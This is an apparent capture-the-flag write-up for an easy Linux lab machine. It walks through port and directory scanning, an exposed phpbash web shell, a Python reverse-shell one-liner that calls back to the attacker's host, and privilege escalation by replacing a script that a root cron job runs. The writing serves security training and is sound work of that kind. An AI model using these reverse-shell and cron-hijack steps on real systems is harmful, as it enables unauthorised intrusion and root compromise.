OS: Linux, Difficult: Easy, IP:

Initial Enumeration

Nmap scan for all TCP ports

sudo nmap -T4 -p- -oN T-all
# Nmap 7.70 scan initiated Tue Jul 2 23:33:14 2019 as: nmap -T4 -p- -oN T-all
Nmap scan report for
Host is up (0.24s latency).
Not shown: 65534 closed ports
80/tcp open http
# Nmap done at Tue Jul 2 23:44:27 2019 -- 1 IP address (1 host up) scanned in 672.99 seconds

Only 1 attack vector i.e. port 80 HTTP server.

sudo nmap -p 80 -sV -sC -oN O-Detailed
# Nmap 7.70 scan initiated Tue Jul 2 23:37:00 2019 as: nmap -p 80 -sV -sC -oN O-Detailed
Nmap scan report for
Host is up (0.23s latency).
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at .
# Nmap done at Tue Jul 2 23:37:12 2019 -- 1 IP address (1 host up) scanned in 12.61 seconds

No searchsploit results for the particular version of the Apache HTTPd Server.

Page with 1 single post that suggests that

Ran gobuster on the server to get a few directories to explore

gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u
/uploads (Status: 301)
/images (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

Uploads and Dev seemed interesting. However, uploads was empty.

phpbash.php got us the web-shell already installed on the server with www-data user.

User Own

> cat /home/arrexel/user.txt

Root Own

Another thing to notice was user www-data is able to run sudo as scriptmanager without a password and there's an interesting folder owned by scriptmanager in the root directory.

sudo -u scriptmanager ls -la /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017
-rw-r--r-- 1 root root 12 Jul 4 02:44 test.txt [TIME CHANGED]
-rw-r--r-- 1 root root 12 Jul 4 03:03 test.txt [TIME CHANGED]

To run I got a reverse shell from the existing web-shell. Using the python server I downloaded the file onto the server and ran to see what all was interesting.

sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);' &

There was nothing too exciting in the output except the fact that there were some crontabs registered for the user root. As evident from the listings of the folder /scripts/ the text file was being generated every minute as stated above.

The code which was being run was

f = open("test.txt", "w")
f.write("testing 123!")

As evident from the permissions, this file can be modified by the scriptmanager user and hence can be used to our leverage.

Craft the following python script on the attacker system, transfer, and replace the file on the machine and wait for the output.

import os
cmd = "cat /root/root.txt > /tmp/root"
sudo -u scriptmanager wget -O /scripts/

After 1 minute we will have our root flag in the /tmp/root file.

> cat /tmp/root

Learning outcome

Having a closer look at suspiciously owned root files, as these may give out important information, as in this case the change in time every minute was the clue to a root owned cron tab.